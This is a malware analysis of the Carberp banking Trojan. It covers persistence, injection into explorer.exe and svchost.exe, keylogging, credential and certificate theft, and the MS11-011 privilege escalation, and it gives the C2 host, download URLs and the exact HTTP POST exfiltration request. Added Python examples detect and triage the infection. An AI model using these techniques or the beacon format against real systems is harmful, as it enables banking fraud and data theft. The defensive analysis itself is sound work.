Trojan.Win32.Carberp (Trojan.Win32.Generic!BT)

by alexander.adamov on October 3rd, 2012 in Malware Descriptions.

Platform: Win32
Type: Trojan
Size: 127035 bytes
Language: C++
MD5: 33e10314899a5b890a25f8cd85d67e67
SHA1: ff0a5ddd0c3769dcf918ec43e83d62d6bcd48bd1
Aliases: Diple, Carberp

Summary

Trojan.Win32.Carberp is spyware designed to steal confidential user data.

Technical Details

Installation

Once run, the Trojan restores the original entries of the System Service Descriptor Table (SSDT), removing any hooks set there. It then copies itself to the current user's Startup folder:

%Documents and Settings%\%Current User%\Start Menu\Programs\Startup\<rnd>.exe

where <rnd> is a random alphanumeric sequence, for example "9sz7mt1lkeb" or "ww25znji2".

Thus the copy is launched automatically each time the current user logs on to Windows.

The creation date and time of the copy are set to match those of the system file:

%System%\smss.exe

To hide its executable file from directory listings, the Trojan hooks the following function:

NtQueryDirectoryFile
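The following added example (not part of the original description) turns the installation indicators above into a triage check: it flags any executable sitting directly in the Startup folder (legitimate entries are normally .lnk shortcuts), scores names that fit the <rnd>.exe pattern, and compares each file's creation time with that of %System%\smss.exe to catch the timestomping. The name heuristic, the tolerance parameter and the default paths are assumptions of this example. Because the Trojan hooks NtQueryDirectoryFile in the live session, run the scan from Safe Mode or against a mounted disk image, where the file is not hidden.

```python
import os
import re
from typing import Iterable, List, Tuple

# Heuristic (an assumption of this example, not from the description) for
# the Trojan's <rnd>.exe names such as "9sz7mt1lkeb.exe" or "ww25znji2.exe":
# a lowercase alphanumeric stem of 6-16 characters containing at least one digit.
RANDOM_STEM = re.compile(r"^(?=.*[0-9])[a-z0-9]{6,16}$")

# Default locations from the description (Windows XP layout); override on Vista+.
DEFAULT_STARTUP = os.path.expandvars(r"%USERPROFILE%\Start Menu\Programs\Startup")
DEFAULT_SMSS = os.path.expandvars(r"%SystemRoot%\system32\smss.exe")


def looks_random(file_name: str) -> bool:
    """True when the name fits the random <rnd>.exe pattern."""
    stem, ext = os.path.splitext(file_name.lower())
    return ext == ".exe" and RANDOM_STEM.match(stem) is not None


def hunt_startup(entries: Iterable[Tuple[str, float]], smss_ctime: float,
                 tolerance: float = 0.0) -> List[Tuple[str, List[str]]]:
    """Pure triage logic over (file_name, creation_time) pairs.

    Returns (file_name, reasons) for every executable found, most suspicious
    first. Three independent signals are reported:
      - an .exe placed directly in the Startup folder (shortcuts are the norm),
      - a random-looking alphanumeric name,
      - a creation time equal (within tolerance) to that of smss.exe.
    """
    findings = []
    for name, ctime in entries:
        if not name.lower().endswith(".exe"):
            continue
        reasons = ["executable placed directly in the Startup folder"]
        if looks_random(name):
            reasons.append("random alphanumeric name matching <rnd>.exe")
        if abs(ctime - smss_ctime) <= tolerance:
            reasons.append("creation time copied from %System%\\smss.exe")
        findings.append((name, reasons))
    findings.sort(key=lambda f: -len(f[1]))
    return findings


def creation_time(path: str) -> float:
    """Creation timestamp: st_ctime on Windows, st_birthtime where exposed."""
    st = os.stat(path)
    return getattr(st, "st_birthtime", st.st_ctime)


def scan_startup_folder(startup_dir: str = DEFAULT_STARTUP,
                        smss_path: str = DEFAULT_SMSS):
    """Filesystem wrapper around hunt_startup, for use from Safe Mode or
    against a mounted image (pass the image's paths explicitly)."""
    entries = [(n, creation_time(os.path.join(startup_dir, n)))
               for n in os.listdir(startup_dir)
               if os.path.isfile(os.path.join(startup_dir, n))]
    return hunt_startup(entries, creation_time(smss_path))


if __name__ == "__main__":
    for name, reasons in scan_startup_folder():
        print(f"{name}: {len(reasons)} indicator(s)")
        for r in reasons:
            print("   -", r)
```

A single match on the timestamp alone is weak evidence (installers occasionally copy timestamps too); the combination of a bare executable, a random name and a smss.exe-identical creation time is what should be escalated.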

Payload

The Trojan launches a copy of the system file:

%WinDir%\explorer.exe

and injects malicious code into its address space. If that fails, it locates the already running "explorer.exe" instead, either by finding the window with the class name "Shell_TrayWnd" (the taskbar window, which belongs to "explorer.exe") or by enumerating all processes and comparing a hash of each process name with the hash of "explorer.exe" stored in the Trojan's body.

The injected code then launches several instances of "svchost.exe" and injects into them the code that implements the functionality described below. The original Trojan file is deleted.
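The description does not say which hash routine the Trojan applies to process names, so the following added example (not original to the page) does what an analyst does in that situation: it computes the hash of "explorer.exe" under several routines commonly found in malware (ROR13, djb2, FNV-1a, CRC32), over the case and encoding variants a comparison loop might consume, and emits each as a little-endian byte pattern to search for in the unpacked sample. The set of candidate algorithms is an assumption of the example; a hit confirms both the routine and the constant, and lets you recover any other process names the same loop checks for.

```python
import struct
import zlib
from typing import Dict, Iterator, Tuple

MASK32 = 0xFFFFFFFF


def ror13(data: bytes) -> int:
    """ROR-13 accumulate hash, common in shellcode-style API/process lookups."""
    h = 0
    for b in data:
        h = ((h >> 13) | (h << 19)) & MASK32
        h = (h + b) & MASK32
    return h


def djb2(data: bytes) -> int:
    """Bernstein hash: h = h * 33 + c, seeded with 5381."""
    h = 5381
    for b in data:
        h = (h * 33 + b) & MASK32
    return h


def fnv1a32(data: bytes) -> int:
    """32-bit FNV-1a."""
    h = 0x811C9DC5
    for b in data:
        h = ((h ^ b) * 0x01000193) & MASK32
    return h


def crc32(data: bytes) -> int:
    return zlib.crc32(data) & MASK32


# Candidate routines (an assumption of this example; the page does not name one).
ALGORITHMS = {"ror13": ror13, "djb2": djb2, "fnv1a32": fnv1a32, "crc32": crc32}


def name_variants(name: str) -> Iterator[Tuple[str, bytes]]:
    """Encodings a process-name comparison loop commonly hashes: lower/upper
    case, ASCII or UTF-16LE, with and without the terminating NUL."""
    for case_label, s in (("lower", name.lower()), ("upper", name.upper())):
        for enc_label, enc in (("ascii", "ascii"), ("utf16le", "utf-16-le")):
            raw = s.encode(enc)
            yield f"{case_label}/{enc_label}", raw
            yield f"{case_label}/{enc_label}+nul", raw + "\0".encode(enc)


def candidate_constants(name: str) -> Dict[Tuple[str, str], Tuple[int, bytes]]:
    """Map (algorithm, variant) -> (hash, little-endian bytes to grep for)."""
    out = {}
    for alg, fn in ALGORITHMS.items():
        for label, raw in name_variants(name):
            h = fn(raw)
            out[(alg, label)] = (h, struct.pack("<I", h))
    return out


if __name__ == "__main__":
    for (alg, label), (h, le) in sorted(candidate_constants("explorer.exe").items()):
        print(f"{alg:8s} {label:22s} 0x{h:08X}  {le.hex(' ')}")
```

Search the unpacked sample (not the packed file on disk) for the 4-byte patterns; if none hits, the routine is custom and the comparison loop itself has to be lifted from the disassembly.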

From the injected "svchost.exe" process the Trojan keeps an open handle to its executable:

%Documents and Settings%\%Current User%\Start Menu\Programs\Startup\<rnd>.exe

so that the file cannot be deleted while that process is running.

The Trojan attempts to counteract the following antivirus products:

Avast
ESET NOD32 Antivirus
ESET Smart Security

The malware collects the following system information:

  • User name, computer name;
  • CPU information;
  • Hardware profile;
  • OS version and installed service pack;
  • Volume serial number;
  • General system information.

The Trojan encrypts the collected data and builds pipe-delimited strings of the following form:

1|fullhaus|<encrypted_data>|0|0|0
2|fullhaus||<encrypted_data>|1|<list_of_launched_processes>

<#>|fullhaus||<encrypted_system_data>|<additional_data_collected_by_Trojan>

where <#> is the operation number; the second field ("fullhaus") is the same in every record.

The Trojan then encrypts those strings and sends them to the attacker’s server:

inspectssl.com

The Trojan connects to the attacker's server and sends HTTP requests of the following form:

POST /e/<rnd2> HTTP/1.0
Host: inspectssl.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Accept: text/html
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

a=<encrypted_data>

where <rnd2> is a random alphanumeric sequence.
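The following added example (not from the original analysis) brings the two formats above together in detection code: it parses a raw HTTP request, scores it against the beacon's fixed traits (POST to /e/<rnd2> over HTTP/1.0 with Connection: Close, the hard-coded MSIE 6.0 User-Agent, the host inspectssl.com, and a body consisting of a single form field a=), and frames a decrypted pipe-delimited record into operation number, tag and payload, handling both the single- and double-separator shapes shown. The sample requests are constructed for the example and the scoring threshold is an assumption; the payload stays opaque here because the page does not document the cipher.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs

C2_HOST = "inspectssl.com"
BEACON_PATH = re.compile(r"^/e/[A-Za-z0-9]+$")
BEACON_UA = ("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; "
             ".NET CLR 2.0.50727; .NET4.0C; .NET4.0E)")


def parse_http_request(raw: bytes) -> Optional[Dict]:
    """Split a raw request into method/path/version, lower-cased headers and body."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return None
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        return None
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return {"method": parts[0], "path": parts[1], "version": parts[2],
            "headers": headers, "body": body}


def beacon_indicators(req: Dict) -> List[str]:
    """Return the Carberp beacon traits the request matches (empty = none)."""
    hits = []
    h = req["headers"]
    if h.get("host", "").lower() == C2_HOST:
        hits.append("host is the known C2 inspectssl.com")
    if req["method"] == "POST" and BEACON_PATH.match(req["path"]):
        hits.append("POST to /e/<rnd2>")
    if req["version"] == "HTTP/1.0" and h.get("connection", "").lower() == "close":
        hits.append("HTTP/1.0 with Connection: Close")
    if h.get("user-agent") == BEACON_UA:
        hits.append("hard-coded MSIE 6.0 User-Agent")
    form = parse_qs(req["body"].decode("latin-1"), keep_blank_values=True)
    if set(form) == {"a"} and h.get("content-type") == "application/x-www-form-urlencoded":
        hits.append("single form field 'a' carrying an opaque blob")
    return hits


def is_carberp_beacon(raw: bytes, threshold: int = 3) -> bool:
    """Threshold (an assumption): 3 of 5 traits, so a changed C2 host or UA still fires."""
    req = parse_http_request(raw)
    return req is not None and len(beacon_indicators(req)) >= threshold


def parse_record(line: str) -> Dict:
    """Frame one decrypted record. Both shapes from the description:
         1|fullhaus|<data>|0|0|0
         2|fullhaus||<data>|1|<processes>
    i.e. the tag is followed by one or two separators before the payload."""
    fields = line.rstrip("\r\n").split("|")
    if len(fields) < 3 or not fields[0].isdigit():
        raise ValueError("not a pipe-delimited bot record")
    rest = fields[2:]
    if rest[0] == "" and len(rest) > 1:      # double-separator variant
        rest = rest[1:]
    return {"op": int(fields[0]), "tag": fields[1], "data": rest[0], "extra": rest[1:]}


# Constructed samples for the example (not captured traffic).
SAMPLE_BEACON = (
    b"POST /e/k3h9dq2 HTTP/1.0\r\n"
    b"Host: inspectssl.com\r\n"
    b"User-Agent: " + BEACON_UA.encode("ascii") + b"\r\n"
    b"Accept: text/html\r\n"
    b"Connection: Close\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 84\r\n"
    b"\r\n"
    b"a=" + b"Q" * 82
)
SAMPLE_BENIGN = (
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Connection: keep-alive\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    for sample in (SAMPLE_BEACON, SAMPLE_BENIGN):
        print(is_carberp_beacon(sample), beacon_indicators(parse_http_request(sample)))
```

The host and User-Agent are the weakest traits (both are trivially changed by a new build); the request shape, POST /e/<rnd2> over HTTP/1.0 with a lone a= field, is what survives across configuration updates, which is why the threshold is set below the full count.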

The Trojan can download an additional configuration file from:

http://inspectssl.com/upfls/8_1_1316531622

The file is 5331 bytes in size. It contains encrypted configuration data. The file is saved as:

%AppData%\<rnd>.dat

Depending on the contents of the downloaded configuration file, the Trojan can perform the following actions on the infected machine:

  • Update its original file by downloading and decrypting a file from the following resource:

http://mega.nn.ru/upload/banners/zsguupuebx

The encrypted file is 139291 bytes in size. The Trojan decrypts it and saves the result to the Startup folder in place of its previous executable; during the update the executable is also written to the temporary folder under a random name:

%Temp%\<tmp>.tmp

where <tmp> is a random name. The updated Trojan executable is 139264 bytes in size.

  • Intercept network traffic by hooking the following WinINet functions:

InternetCloseHandle
InternetQueryDataAvailable
InternetReadFile
InternetReadFileExA
InternetReadFileExW
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW

  • Log keyboard input;
  • Render the system unbootable by deleting critical system files:

%System%\hal.dll
C:\ntldr

  • Steal the user's confidential data entered during internet-banking sessions;
  • Steal data the user types into windows of the "TLoginWindow" class. The file with the stolen data has the following format:

login: <login>
password: <password>
path: <full_path_to_executable_file_of_application>

  • Take a screenshot of the current display using its embedded library "screens_dll.dll". The screenshot is saved as a compressed JPEG in the current user's temporary folder, first as:

%Temp%\<tmp>.tmp

and then as:

%Temp%\screen.jpeg

  • Elevate to SYSTEM privileges by exploiting a Windows kernel vulnerability (MS11-011). The exploit is used on Windows Vista SP2 and Windows 7.
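The hook list above is what a memory triage tool checks: when those wininet.dll exports are hooked inline, their first bytes are overwritten with a detour. The following added example (not part of the page) classifies the 32-bit detour stubs most commonly written there (JMP rel32, JMP [abs32], PUSH/RET, MOV EAX/JMP EAX) and reports whether the target lies outside wininet.dll, which is the useful signal, since security products also hook these exports legitimately. The stub patterns are standard x86 hooking idioms, not something the description attributes to this sample. The Windows-only collector at the end reads the exports from the scanning process's own copy of the DLL; to check an injected "svchost.exe" the same bytes have to be read from that process with ReadProcessMemory.

```python
import struct
import sys
from typing import Dict, List, Optional, Tuple

# wininet.dll exports listed in the description as hooked by the Trojan.
HOOKED_EXPORTS = [
    "InternetCloseHandle", "InternetQueryDataAvailable", "InternetReadFile",
    "InternetReadFileExA", "InternetReadFileExW", "HttpSendRequestA",
    "HttpSendRequestW", "HttpSendRequestExA", "HttpSendRequestExW",
]


def classify_prologue(code: bytes, func_va: int) -> Optional[Tuple[str, int]]:
    """Recognise common 32-bit inline-hook stubs at a function entry.

    Returns (kind, target_va) or None when the bytes do not look detoured
    (e.g. the usual hot-patchable prologue 8B FF 55 8B EC).
    """
    if len(code) < 5:
        raise ValueError("need at least 5 bytes of the prologue")
    if code[0] == 0xE9:                                   # JMP rel32
        rel = struct.unpack_from("<i", code, 1)[0]
        return "jmp_rel32", (func_va + 5 + rel) & 0xFFFFFFFF
    if code[:2] == b"\xFF\x25" and len(code) >= 6:        # JMP DWORD PTR [abs32]
        # target is the address of the pointer, not the final destination
        return "jmp_indirect", struct.unpack_from("<I", code, 2)[0]
    if code[0] == 0x68 and len(code) >= 6 and code[5] == 0xC3:          # PUSH imm32; RET
        return "push_ret", struct.unpack_from("<I", code, 1)[0]
    if code[0] == 0xB8 and len(code) >= 7 and code[5:7] == b"\xFF\xE0":  # MOV EAX,imm32; JMP EAX
        return "mov_eax_jmp", struct.unpack_from("<I", code, 1)[0]
    return None


def hook_report(export: str, code: bytes, func_va: int,
                module_base: int, module_size: int) -> Optional[Dict]:
    """Classify one export and say whether its detour leaves the module."""
    found = classify_prologue(code, func_va)
    if found is None:
        return None
    kind, target = found
    inside = module_base <= target < module_base + module_size
    return {"export": export, "kind": kind, "target": target,
            "outside_module": not inside}


def scan_live_wininet() -> List[Dict]:
    """Windows-only collector: classify the listed exports in this process.
    SizeOfImage is read from the in-memory PE header (e_lfanew + 0x50)."""
    if sys.platform != "win32":
        raise RuntimeError("live scan requires Windows")
    import ctypes
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.GetProcAddress.restype = ctypes.c_void_p
    k32.GetProcAddress.argtypes = [ctypes.c_void_p, ctypes.c_char_p]
    base = ctypes.WinDLL("wininet")._handle
    e_lfanew = struct.unpack("<I", ctypes.string_at(base + 0x3C, 4))[0]
    size = struct.unpack("<I", ctypes.string_at(base + e_lfanew + 0x50, 4))[0]
    findings = []
    for name in HOOKED_EXPORTS:
        va = k32.GetProcAddress(base, name.encode("ascii"))
        if va:
            r = hook_report(name, ctypes.string_at(va, 8), va, base, size)
            if r:
                findings.append(r)
    return findings


if __name__ == "__main__":
    for f in scan_live_wininet():
        flag = "OUTSIDE wininet.dll" if f["outside_module"] else "inside module"
        print(f"{f['export']:28s} {f['kind']:12s} -> 0x{f['target']:08X} ({flag})")
```

A detour whose target is inside the module is usually Microsoft hot-patching or a forwarder; a detour into an unbacked, executable region of a svchost.exe process is the pattern to expect from the injected code described here.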

The stolen information is first written to the file:

%Temp%\<tmp>.tmp

and then saved as:

%Temp%\Information.txt

The report file has the following format:

Program: <program_name>
Wnd Name: <active_window_name>
Server: <address>:<port>
Password: <password>
Certificate: <certificate>
ClipBuffer: <history_of_characters_entered_by_user>
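The "TLoginWindow" records and the Information.txt report share a simple key: value layout, so one parser covers both. The following added example (not the analyst's tooling) splits a recovered dump into typed records, normalises Server: <address>:<port>, and produces the two lists an incident responder needs first, the banking servers to notify and the accounts to reset, while redacting the secrets themselves so they do not end up in a ticket. The sample dump is constructed for the example and the field names are taken from the two formats above; anything else is an assumption.

```python
from typing import Dict, List, Optional, Tuple

# Field names from the two record formats in the description (lower-cased).
TLOGIN_KEYS = ("login", "password", "path")
REPORT_KEYS = ("program", "wnd name", "server", "password", "certificate", "clipbuffer")
RECORD_START = {"login": "tlogin", "program": "report"}   # first key of each record type
SECRET_KEYS = ("password", "certificate", "clipbuffer")


def parse_stolen_data(text: str) -> List[Dict[str, str]]:
    """Split a recovered dump into records; a new record starts at every
    'login:' or 'Program:' line. Unknown lines are ignored."""
    records: List[Dict[str, str]] = []
    current: Optional[Dict[str, str]] = None
    for raw in text.splitlines():
        key, sep, value = raw.partition(":")
        key = key.strip().lower()
        if not sep or key not in TLOGIN_KEYS + REPORT_KEYS:
            continue
        if key in RECORD_START or current is None:
            current = {"_type": RECORD_START.get(key, "unknown")}
            records.append(current)
        current[key] = value.strip()
    return records


def split_server(value: str) -> Tuple[str, Optional[int]]:
    """'203.0.113.10:443' -> ('203.0.113.10', 443); no port -> (value, None)."""
    host, sep, port = value.rpartition(":")
    if sep and port.isdigit():
        return host, int(port)
    return value, None


def redact(record: Dict[str, str]) -> Dict[str, str]:
    """Copy of a record with secrets replaced by their length only."""
    out = dict(record)
    for k in SECRET_KEYS:
        if out.get(k):
            out[k] = f"<redacted {len(out[k])} chars>"
    return out


def triage_summary(records: List[Dict[str, str]]) -> Dict[str, list]:
    """Servers to notify, (application path, login) pairs to reset, programs seen."""
    servers = {split_server(r["server"]) for r in records if r.get("server")}
    accounts = {(r.get("path", ""), r["login"])
                for r in records if r["_type"] == "tlogin" and "login" in r}
    programs = {r["program"] for r in records if r.get("program")}
    return {"servers": sorted(servers, key=repr),
            "accounts": sorted(accounts),
            "programs": sorted(programs)}


# Constructed sample (not real stolen data); uses the documentation address 203.0.113.10.
SAMPLE_DUMP = """login: jsmith
password: Winter2012!
path: C:\\Program Files\\ClientBank\\client.exe

Program: iexplore.exe
Wnd Name: Online Banking - Internet Explorer
Server: 203.0.113.10:443
Password: hunter2
Certificate: MIIB...
ClipBuffer: 4111 1111 1111 1111
"""

if __name__ == "__main__":
    recs = parse_stolen_data(SAMPLE_DUMP)
    for r in recs:
        print(redact(r))
    print(triage_summary(recs))
```

The Certificate: field means a client certificate may have been exported along with the password, so the affected bank should be asked to revoke it rather than just reset credentials.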

Using the "cabinet.dll" library, the Trojan packs the files with stolen data into a CAB archive:

%Temp%\CAB<tmp>.tmp

The archive is then encrypted and sent to the attacker's server, after which the file is deleted.

Removal Recommendations

In Safe Mode the Startup-folder copy is not launched, so its file is neither hidden by the NtQueryDirectoryFile hook nor held open by the injected "svchost.exe" process, and it can be deleted.

  1. Restart the computer in Safe Mode (press and hold the F8 key as the computer restarts, then select "Safe Mode" on the boot menu).
  2. Delete the Trojan executable and its configuration file:
     %Documents and Settings%\%Current User%\Start Menu\Programs\Startup\<rnd>.exe
     %AppData%\<rnd>.dat
  3. Delete the contents of the %Temp% folder (it holds the <tmp>.tmp, Information.txt, screen.jpeg and CAB<tmp>.tmp files described above).
  4. Clean the Temporary Internet Files folder, which may contain infected files.
  5. Install the latest Windows updates, including the fix for MS11-011:
     http://technet.microsoft.com/ru-ru/security/bulletin/ms11-011
  6. Run a full scan of the computer with an antivirus program using an up-to-date definition database.